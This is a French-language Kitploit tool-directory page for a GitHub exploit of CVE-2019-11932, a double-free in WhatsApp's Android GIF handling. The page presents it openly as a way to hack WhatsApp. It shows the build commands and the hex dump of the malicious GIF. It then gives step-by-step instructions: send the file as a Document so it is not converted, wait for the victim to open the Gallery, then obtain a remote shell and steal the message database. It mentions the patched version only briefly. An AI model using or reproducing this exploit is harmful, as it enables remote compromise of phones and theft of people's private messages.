Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-11932 — Programme pour pirater WhatsApp via Gif, en créant un exploit avec le port. | Kitploit
Outils/GitHubGitHub/fastmo/cve-2019-11932
Sécurité AndroidGénération de PayloadsAnalyse des VulnérabilitésExploitationSécurité MobileOutil d'Accès à DistanceExploitation de Binaires
GitHubfastmo/cve-2019-11932

CVE-2019-11932

Programme pour pirater WhatsApp via Gif, en créant un exploit avec le port.

Voir le dépôt
1711il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-11932

L'adresse système () et le gadget doivent être remplacés par l'adresse réelle trouvée par une vulnérabilité de divulgation d'informations.

Après avoir remplacé l'adresse système () et le gadget. Exécutez le code pour générer le fichier GIF malveillant :

root@kitploit:~
notroot@osboxes:~/Desktop/gif$ make
.....
.....
.....
notroot@osboxes:~/Desktop/gif$ ./exploit exploit.gif
buffer = 0x7ffc586cd8b0 size = 266
47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC
FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00
00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08
9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 84 9C 09 B0
C5 07 00 00 00 74 DE E4 11 F3 06 0F 08 37 63 40
C4 C8 21 C3 45 0C 1B 38 5C C8 70 71 43 06 08 1A
34 68 D0 00 C1 07 C4 1C 34 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 54 12 7C C0 C5 07 00 00 00 EE FF FF 2C 00 00
00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00
18 00 0A 00 0F 00 01 00 00 3B

Ensuite, copiez le fichier exploit.gif et envoyez-le comme Document via WhatsApp à un autre utilisateur WhatsApp. Notez qu'il ne doit pas être envoyé comme un fichier multimédia, sinon WhatsApp essaie de le convertir en MP4 avant de l'envoyer. Une fois que l'utilisateur reçoit le fichier GIF malveillant, rien ne se passera jusqu'à ce que l'utilisateur ouvre la Galerie WhatsApp pour envoyer un fichier multimédia à son ami.

Instructions

Vecteurs d'attaque GIF de WhatsApp (Mini actualité et Instructions à la fin)

root@kitploit:~
                              -----Mini actualité et INSTRUCTIONS----

Le piratage de WhatsApp GIF peut être exécuté de deux manières

Phase de privilège local (d'une application utilisateur vers WhatsApp) : une application malveillante est installée sur le dispositif Android. L'application collecte les adresses des bibliothèques zygote et crée un fichier GIF malveillant qui entraîne l'exécution de code dans WhatsApp. Cela permet à l'application de malware de voler des fichiers du bac à sable de WhatsApp, y compris la base de données de messages. Exécution de code à distance : couplage avec une application qui possède une vulnérabilité de divulgation d'informations mémoire à distance. L'attaquant peut collecter les adresses des bibliothèques zygote et créer un fichier GIF malveillant à envoyer à l'utilisateur via WhatsApp (doit être une pièce jointe, pas une image via le sélecteur de galerie car WhatsApp essaie de convertir les fichiers multimédia en MP4, ce qui rendrait votre GIF malveillant inutile). Dès que l'utilisateur ouvre la vue Galerie dans WhatsApp, le fichier GIF déclenche un shell distant dans le contexte de WhatsApp. À lire : 4 Hacks Fitbit que vous n'avez jamais connus avant WhatsApp sur les derniers Android est piratable Les versions Android 8.1 et 9.0 sont exploitables, tandis que les versions antérieures ne le sont pas. Le chercheur dit que le bug de double libération pourrait encore être déclenché sur les versions antérieures du système d'exploitation, mais un crash se produit avant qu'un code malveillant puisse être exécuté pour réaliser un RCE. GIF malveillant qui pirate WhatsApp Conclusion : Facebook a reconnu le problème de sécurité et a corrigé le problème dans WhatsApp version 2.19.244. Bien que Facebook ait essayé de faire croire que ce n'est pas une grande vulnérabilité, alors qu'en réalité c'est assez désagréable. Comme toujours, gardez vos applications à jour et n'installez pas d'applications inutiles.

--------------------------------------------------------Étapes---------------------------------------------------------------------------

Compilez simplement le code dans ce dépôt. L'adresse système () et le gadget doivent être remplacés par l'adresse réelle, trouvée par une vulnérabilité de divulgation d'informations que vous devez découvrir par vous-même en utilisant d'autres techniques avant que le GIF ne fasse un RCE pour vous. Une fois que vous compilez le code mentionné dans le lien précédent, copiez le contenu dans un fichier GIF et envoyez-le comme Document via WhatsApp à un autre utilisateur WhatsApp. Rappelez-vous de ne pas l'envoyer comme un fichier multimédia, sinon WhatsApp essaie de le convertir en MP4 avant de l'envoyer. Une fois que l'utilisateur reçoit le fichier GIF malveillant, rien ne se passera jusqu'à ce que l'utilisateur ouvre la Galerie WhatsApp pour envoyer un fichier multimédia à son ami.

Télécharger l’outil